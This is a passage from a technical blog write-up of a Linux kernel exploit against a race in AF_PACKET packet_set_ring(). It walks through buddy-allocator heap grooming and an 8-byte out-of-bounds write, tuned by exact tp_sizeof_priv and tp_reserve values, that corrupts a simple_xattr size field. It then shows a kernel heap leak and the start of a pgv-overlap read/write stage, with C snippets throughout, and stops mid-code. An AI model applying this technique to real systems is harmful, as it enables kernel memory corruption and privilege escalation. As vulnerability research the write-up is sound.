&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
Step 1: Allocate 1024 &#215; 16KB pages (drains order-2 freelist)
Step 2: Allocate 1024 &#215; 32KB pages (drains order-3 freelist)      &#8592; "drain batch 1"
Step 3: Allocate 512 &#215; 32KB pages (more order-3 drain)            &#8592; "drain batch 2"

After draining, the order-2 and order-3 freelists are empty.
Any new allocation at these sizes must come from splitting higher-order pages.

Phase 2: Allocate the victim ring buffer
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
Step 4: Configure victim socket &#8594; RX ring allocates 2 &#215; 32KB blocks (order-3)

Since the order-3 freelist is empty, these blocks come from splitting
order-4 or higher pages &#8594; they land at HIGH virtual addresses.

Phase 3: Build the simple_xattr spray region
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
Step 5: Free drain batch 1 (1024 &#215; 32KB order-3 pages)

These pages return to the order-3 freelist at LOWER addresses
than the victim's blocks (they were allocated earlier, before draining
pushed the allocator to higher-order pages).

Step 6: Spray 2048 simple_xattr objects (each with 8KB value &#8594; order-2 page)

The order-2 freelist is still empty (drained in step 1, never freed).
So the buddy allocator splits the just-freed order-3 pages from step 5:
each 32KB page becomes two 16KB halves. The simple_xattr values fill
these halves, creating a dense region of order-2 pages at LOW addresses.

Step 7: Free sparse holes &#8212; every 128th xattr starting from index 512

    for (i = 512; i &lt; 2048; i += 128)
        removexattr(simple_xattr_requests[i]);

This frees ~12 order-2 pages scattered among the simple_xattr objects,
returning them to the order-2 freelist. These holes are the landing
slots for the reclamation ring's blocks.

Phase 4: Trigger the race and reclaim
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
Step 8: Win the race &#8594; packet_set_ring() frees the old ring buffer

The victim's 2 &#215; 32KB blocks are freed back to the order-3 freelist.
They are at HIGH addresses. The pgv array (16 bytes) is freed to slab.

Step 9: pg_vec_buffer_thread immediately reclaims:
    alloc_pages(reclaim_socket, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16, PAGES_ORDER2_SIZE)

This allocates a new ring with 2 &#215; 16KB blocks. The allocator needs
order-2 pages. The order-2 freelist has the sparse holes from step 7
(exact-size matches), so it serves from those FIRST &#8212; before considering
splitting the victim's freed order-3 pages. The reclamation blocks
land in the holes among the simple_xattr objects, at LOW addresses,
surrounded by simple_xattr objects on both sides.</code></pre></div><p>The result is this memory layout:</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ppH3!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ppH3!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png 424w, https://substackcdn.com/image/fetch/$s_!ppH3!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png 848w, https://substackcdn.com/image/fetch/$s_!ppH3!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png 1272w, https://substackcdn.com/image/fetch/$s_!ppH3!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ppH3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png" width="1456" height="361" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:361,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:195361,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://blog.calif.io/i/189789999?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ppH3!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png 424w, https://substackcdn.com/image/fetch/$s_!ppH3!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png 848w, https://substackcdn.com/image/fetch/$s_!ppH3!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png 1272w, https://substackcdn.com/image/fetch/$s_!ppH3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc611b211-4b3e-4738-8372-87202e6cf0a7_2948x730.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>Why block 0 can&#8217;t work, even if it were reclaimed.</strong> One might ask: couldn&#8217;t the victim&#8217;s freed order-3 blocks be buddy-split into order-2 halves, with one half adjacent to a simple_xattr? The answer is no &#8212; those blocks are at high addresses, far from the simple_xattr spray region. Even if the buddy allocator did split them, the two halves would be adjacent to <em>each other</em> (they&#8217;re buddy pairs), not to any simple_xattr. The exploit has no control over what&#8217;s physically next to the victim&#8217;s old pages.</p><p>By contrast, the reclamation blocks land in the carefully prepared holes among the simple_xattr spray, where adjacency is guaranteed. But the stale nxt_offset for block 0 still points to the victim&#8217;s old high-address region, not into these holes. So the exploit must force advancement to block 1.</p><p><strong>The stale metadata.</strong> The TPACKET_V3 metadata (prb_bdqc) in the victim socket is <strong>not updated</strong> during the free &#8212; it still contains stale values from the original 32 KB ring:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;f361d73e-1411-4379-bd3f-b12ab00162f1&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">pkc-&gt;pkbdq         &#8594; old pgv array address (now reclaimed with new pgv)
pkc-&gt;kblk_size     &#8594; 32768 (32 KB &#8212; the OLD block size)
pkc-&gt;knum_blocks   &#8594; 2
pkc-&gt;blk_sizeof_priv &#8594; 16248
pkc-&gt;kactive_blk_num &#8594; 0
pkc-&gt;nxt_offset    &#8594; old_block_0 + 16296 (HIGH address &#8212; stale)</code></pre></div><p>When tpacket_rcv() accesses the ring buffer through __packet_lookup_frame_in_block():</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;21a913d4-a550-4da9-8fc6-fdc6ebe1f883&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">pkc = &amp;po-&gt;rx_ring.prb_bdqc;
pbd = pkc-&gt;pkbdq[pkc-&gt;kactive_blk_num].buffer;  // reads reclaimed pgv[0].buffer
                                                   // = new 16KB block (LOW address, in xattr region)
curr = pkc-&gt;nxt_offset;    // old_block_0 + 16296 (HIGH address &#8212; stale)
end = (char *)pbd + pkc-&gt;kblk_size;   // new_block_0 + 32768 (still LOW)

if (curr + ALIGN(len, 8) &lt; end) {
    // packet fits in current block &#8212; write here
} else {
    prb_retire_current_block(pkc, po, 0);         // retire new_block_0
    curr = prb_dispatch_next_block(pkc, po);      // advance to new_block_1
    // ... write to new_block_1
}</code></pre></div><p>Since curr (high address) &gt; end (low address + 32KB), the &#8220;doesn&#8217;t fit&#8221; branch is always taken, and tpacket_rcv() advances to block 1 &#8212; which is in the groomed region, adjacent to a simple_xattr.</p><h4>Part 3: The precision overflow</h4><p>When tpacket_rcv() takes the &#8220;doesn&#8217;t fit&#8221; path, it calls prb_retire_current_block() then prb_dispatch_next_block(), which advances to block 1 and calls prb_open_block():</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;a1b03f99-29f5-4e2c-a072-4c72e3887b1e&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">static void prb_open_block(struct tpacket_kbdq_core *pkc,
    struct tpacket_block_desc *pbd)
{
    pkc-&gt;pkblk_start = (char *)pbd;   // start of reclaimed block 1 (16 KB)
    pkc-&gt;nxt_offset = pkc-&gt;pkblk_start + BLK_PLUS_PRIV(pkc-&gt;blk_sizeof_priv);
    pkc-&gt;pkblk_end = pkc-&gt;pkblk_start + pkc-&gt;kblk_size;  // + 32KB (stale!)
}</code></pre></div><p>The key computation: BLK_PLUS_PRIV(blk_sizeof_priv) = BLK_HDR_LEN + ALIGN(blk_sizeof_priv, 8) where BLK_HDR_LEN = ALIGN(sizeof(struct tpacket_block_desc), 8) = 48. With blk_sizeof_priv = 16248:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;d24e8c9c-cf23-4771-9ffb-423b4b58c878&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">nxt_offset = reclaimed_block_1 + 48 + 16248 = reclaimed_block_1 + 16296</code></pre></div><p>The actual block size is 16,384 bytes (16 KB = 4 pages). So nxt_offset is positioned <strong>88 bytes before the end</strong> of the actual block. But pkblk_end is computed using the stale kblk_size = 32768, placing it 16 KB past the real end &#8212; so tpacket_rcv() believes there&#8217;s plenty of room.</p><p>Back in tpacket_rcv(), the function returns h.raw = nxt_offset and proceeds to write at several offsets from h.raw:</p><p><strong>Non-controlled writes</strong> (kernel-generated headers):</p><ul><li><p>At h.raw + 0: the tpacket3_hdr structure (44 bytes of status, timestamps, lengths)</p></li><li><p>At h.raw + 48: the sockaddr_ll structure (~20 bytes of link-layer address info)</p></li></ul><p>These occupy offsets 0 through ~67 from h.raw, fitting within the 88 remaining bytes. <strong>They stay inside the block.</strong></p><p><strong>Controlled write</strong> (attacker&#8217;s packet data):</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;24e81ca7-7c18-4392-b485-8901fece6daa&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">skb_copy_bits(skb, 0, h.raw + macoff, snaplen);</code></pre></div><p>Where macoff is calculated as:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;338f1605-94b6-4ae3-9815-d00fa2d46c95&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">macoff = netoff - maclen;
netoff = TPACKET_ALIGN(po-&gt;tp_hdrlen + max(maclen, 16)) + po-&gt;tp_reserve;</code></pre></div><p>The exploit controls two knobs in this calculation to land the write at an exact byte offset:</p><ul><li><p><strong>tp_sizeof_priv</strong> (set via setsockopt(PACKET_RX_RING)) &#8212; controls where nxt_offset starts within the block. This is the coarse knob: the kernel rounds it up to 8 bytes (ALIGN(blk_sizeof_priv, 8)), so it can only position nxt_offset at 8-byte increments.</p></li><li><p><strong>tp_reserve</strong> (set via setsockopt(PACKET_RESERVE)) &#8212; adds padding between the TPACKET header and the packet data. This is the fine knob: it&#8217;s added without any rounding, giving byte-level precision.</p></li></ul><p>Together they work like a vernier caliper. The exploit uses tp_sizeof_priv = 16248 and tp_reserve = 38, but any pair where ALIGN(tp_sizeof_priv, 8) + tp_reserve = 16286 works (e.g., 16280 + 6).</p><p>The write position within a block is nxt_offset + macoff:</p><ul><li><p>nxt_offset = 48 + ALIGN(tp_sizeof_priv, 8) = 48 + 16248 = 16296</p></li><li><p>macoff = netoff - maclen, where netoff = TPACKET_ALIGN(tp_hdrlen + 16) + tp_reserve = TPACKET_ALIGN(68 + 16) + 38 = 96 + 38 = 134, and maclen = 14 (ETH_HLEN), so macoff = 120</p></li><li><p>write position = 16296 + 120 = 16416 = 16384 + 32</p></li></ul><p>The block is only 16,384 bytes, so the write lands <strong>32 bytes past the block boundary</strong> into the adjacent page. The BPF filter truncates snaplen to sizeof(size_t) = 8 bytes, so the exploit writes exactly <strong>8 bytes</strong> at that offset.</p><p>The following diagram shows the full structure from the packet socket down to the per-block memory layout, including both positioning knobs (blk_sizeof_priv and tp_reserve):</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!OykP!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!OykP!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png 424w, https://substackcdn.com/image/fetch/$s_!OykP!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png 848w, https://substackcdn.com/image/fetch/$s_!OykP!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png 1272w, https://substackcdn.com/image/fetch/$s_!OykP!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!OykP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png" width="1456" height="720" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:720,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:400138,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://blog.calif.io/i/189789999?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!OykP!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png 424w, https://substackcdn.com/image/fetch/$s_!OykP!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png 848w, https://substackcdn.com/image/fetch/$s_!OykP!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png 1272w, https://substackcdn.com/image/fetch/$s_!OykP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8bdebd30-e6fd-44a5-9210-200331bfcd15_2818x1394.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h4>What lives at the overflow offset?</h4><p>The exploit sprays 2,048 simple_xattr kernel objects adjacent to the reclamation blocks. Each xattr is allocated with value_size = 8192, making the total allocation (header + 8,192 bytes) served from order-2 pages (16 KB).</p><p><strong>The overflow lands exactly on the size field</strong> of the adjacent simple_xattr. This is not a coincidence &#8212; tp_sizeof_priv (16,248) positions nxt_offset at 16,296, and tp_reserve (38) is chosen so that nxt_offset + macoff = 16,416 = 16,384 + 32, landing precisely at the size field&#8217;s offset within the simple_xattr struct.</p><p>The packet data is crafted with XATTR_SIZE_MAX (65,536) as the first 8 bytes:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;a2040367-5941-46a4-8e34-87e9554c9ff7&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">u8 packet_data[128] = {};
*(size_t *)(packet_data) = XATTR_SIZE_MAX;  // 65536</code></pre></div><p>After the overflow, one of the 2,048 simple_xattr objects has its size field changed from 8,192 to 65,536.</p><h4>Creating the holes for adjacency</h4><p>The simple_xattr spray is arranged to maximize the probability that one ends up immediately after reclamation block 1:</p><p>Step 5: Free drain_pages_order3_1 &#8212; returns 1024 &#215; 32KB pages to the freelist</p><p>Step 6: Spray 2,048 simple_xattr objects &#8212; each needs 16KB (order-2) pages</p><p>Since the order-2 freelist was drained in step 1, the buddy allocator <strong>splits</strong> the freed order-3 pages: each 32 KB page becomes two 16 KB halves. The spray consumes these halves, filling the address range previously occupied by drain_pages_order3_1.</p><p>Before triggering the race, the exploit frees some xattrs at regular intervals to create holes:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;1cfef30d-92dc-4c4c-a89b-ce5b07bcea8d&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">for (int i = 512; i &lt; 2048; i += 128) {
    removexattr(filepath, name_i);  // creates a 16KB hole every 128 objects
}</code></pre></div><p>The reclamation ring&#8217;s block 1 (16 KB) lands in one of these holes. Since the holes are periodic and the surrounding slots are occupied by simple_xattr objects, the page immediately after block 1 is very likely to contain a simple_xattr.</p><h4>Detecting the corruption</h4><p>The exploit scans all sprayed xattrs to find the corrupted one:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;1b5edaab-2869-4f7c-a755-147f63bbfe2a&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">for (int i = 0; i &lt; 2048; i++) {
    ssize_t ret = getxattr(filepath, name_i, value, 8192);
    if (ret &lt; 0 &amp;&amp; errno == ERANGE) {
        // Found it! size was changed from 8192 to 65536
        overflowed_xattr = i;
    }
}</code></pre></div><p>Normally, getxattr() with a buffer of 8,192 bytes succeeds because xattr-&gt;size == 8192. But for the corrupted xattr, xattr-&gt;size == 65536 &gt; 8192, so the kernel returns ERANGE (&#8221;buffer too small&#8221;). This is the signal.</p><h4>Building the heap read primitive</h4><p>Now the exploit has a <strong>heap read primitive</strong>: calling getxattr() with a 65,536-byte buffer on the corrupted xattr reads 65,536 bytes starting from the xattr&#8217;s value field. Since the xattr&#8217;s actual data is only 8,192 bytes but the kernel thinks size is 65,536, it copies 65,536 bytes &#8212; leaking ~57 KB of adjacent kernel heap memory.</p><p>The exploit uses this to find another simple_xattr in the leaked data, identifying it by pattern-matching the rb_node pointers (must be valid kernel addresses or NULL), the name pointer (must be a kernel address), the size field (must equal 8,192), and the value content (must match the known spray pattern like &#8220;pages_order2_groom_42&#8221;). This second xattr is called leaked_content_simple_xattr.</p><p>Next, the exploit <strong>removes all other xattrs</strong> &#8212; it loops through all 2,048 sprayed entries and calls removexattr() on every one except the corrupted xattr and the leaked one. This reduces the inode&#8217;s red-black tree from ~2,048 nodes to exactly <strong>two</strong>. In a two-node tree, one node is the root and the other is its child &#8212; so the leaked xattr&#8217;s rb_node pointers (parent, left, right) <strong>must</strong> reference the corrupted xattr, since there is no other node they could point to. With 2,048 nodes, the leaked xattr&#8217;s tree neighbors could be any of the other sprayed xattrs, and finding the corrupted one among them would be unreliable. The cleanup step eliminates this ambiguity.</p><p>Now the exploit calls getxattr() a second time on the corrupted xattr with a 65,536-byte buffer. This works the same way as the first read: the kernel copies 65,536 bytes starting from the corrupted xattr&#8217;s value[] field, spilling past its actual 8,192 bytes of data into adjacent heap memory. The leaked xattr lives on a nearby order-2 page (the first read already identified which page offset it sits at), so its rb_node pointers appear at a known position within the 65KB dump.</p><p>The key difference from the first read: the tree has been pruned to two nodes. The kernel reorganized the red-black tree as it removed the other ~2,046 xattrs, updating the remaining nodes&#8217; pointers along the way. In the resulting two-node tree, the leaked xattr&#8217;s rb_node.__rb_parent_color points to its parent (the corrupted xattr, if the corrupted xattr is the root) or its rb_left/rb_right points to the corrupted xattr (if the leaked xattr is the root). Either way, one of the three rb_node pointers contains the corrupted xattr&#8217;s kernel address:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;0f4f1cf1-1e24-4a67-9dcb-36cfeebc15aa&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">u64 parent = (u64)(__rb_parent(leaked_simple_xattr-&gt;rb_node.__rb_parent_color));
u64 left   = (u64)(leaked_simple_xattr-&gt;rb_node.rb_left);
u64 right  = (u64)(leaked_simple_xattr-&gt;rb_node.rb_right);
overflowed_simple_xattr_kernel_address = parent ? parent : (left ? left : right);</code></pre></div><p>From the corrupted xattr&#8217;s address and the known offset between the two xattrs in the leak data (each xattr occupies one order-2 page, so the offset is page_index &#215; 16384), the exploit calculates the kernel address of leaked_content_simple_xattr itself. These two addresses are the foundation for Stage 2.</p><h3>Stage 2: Heap Read/Write via pgv Overlap</h3><p>Stage 1 gave us two things: a heap read primitive (through the corrupted xattr with size = 65536) and the kernel addresses of two simple_xattr objects. But the heap read only works through getxattr() &#8212; a one-directional, read-only channel. To build a full read/write primitive, the exploit triggers the race a <strong>second time</strong>, this time overflowing into a pgv array to gain direct memory-mapped access to a simple_xattr in kernel memory.</p><h4>The target: pgv arrays instead of xattrs</h4><p>The key idea: if the overflow writes a <strong>kernel address</strong> into a pgv[N].buffer entry of some ring buffer, then mmap()&#8217;ing that ring buffer maps pgv[N].buffer into userspace. If pgv[N].buffer points to a simple_xattr object, the attacker gets a direct userspace pointer to live kernel data &#8212; readable and writable without any syscall.</p><p>The exploit creates 256 packet sockets and gives each one a TX ring buffer whose pgv array is large enough to be allocated from order-2 pages (16 KB). The size is chosen by setting the block count to MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;39b172b9-bc25-4586-a553-e935dd0dc08d&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">#define MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2  ((KMALLOC_8K_SIZE / sizeof(struct pgv)) + 1)

// = (8192 / 8) + 1 = 1025</code></pre></div><p>Each ring buffer block is tracked by one struct pgv (a single 8-byte pointer), so 1,025 blocks means a pgv array of 1025 &#215; 8 = 8,200 bytes. This goes through kcalloc(1025, sizeof(struct pgv)) inside alloc_pg_vec(). The number 1,025 is deliberately one more than 1,024: with exactly 1,024 blocks, the array would be 8,192 bytes, which fits inside the kmalloc-8k slab bucket &#8212; and slab allocations don&#8217;t participate in page-level grooming. By requesting 1,025 blocks (8,200 bytes), the allocation exceeds the kmalloc-8k limit and falls through to the <strong>page allocator</strong>, which serves it from order-2 pages (16 KB). This is essential because the pgv arrays must land on order-2 pages to match the size of the holes created during heap grooming. Order-3 pages would also work but would waste twice as much memory.</p><h4>Heap grooming</h4><p>The grooming follows the same pattern as Stage 1, with reduced allocation counts (since memory is limited):</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;365864f3-fb4d-460e-a74c-63929a92b023&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">Step 1: Drain order-2 freelist &#8212; 256 &#215; 16 KB pages
Step 2: Drain order-3 freelist &#8212; 128 &#215; 32 KB pages (drain_pages_order3_1)
Step 3: More order-3 drain &#8212; 128 &#215; 32 KB pages (drain_pages_order3_2)
Step 4: Configure victim socket &#8212; RX ring allocates 2 &#215; 32 KB blocks (high addresses)
Step 5: Free drain_pages_order3_1 &#8212; returns 128 &#215; 32 KB pages
Step 6: Spray 256 pgv arrays &#8212; each 8,200 bytes, served from order-2 pages
         (buddy allocator splits the freed order-3 pages into order-2 halves)
Step 7: Free some pgv arrays to create holes for reclamation</code></pre></div><p>The hole creation is sparse &#8212; 6 holes every 16 entries starting at index 64:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;d14064f0-139d-4bba-9738-894d9bea6393&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">for (int i = 64, free_count = 0;
     i &lt; 256 &amp;&amp; free_count &lt; 6;
     i += 16, free_count++) {
    free_pages(spray_pg_vec_packet_sockets[i]);
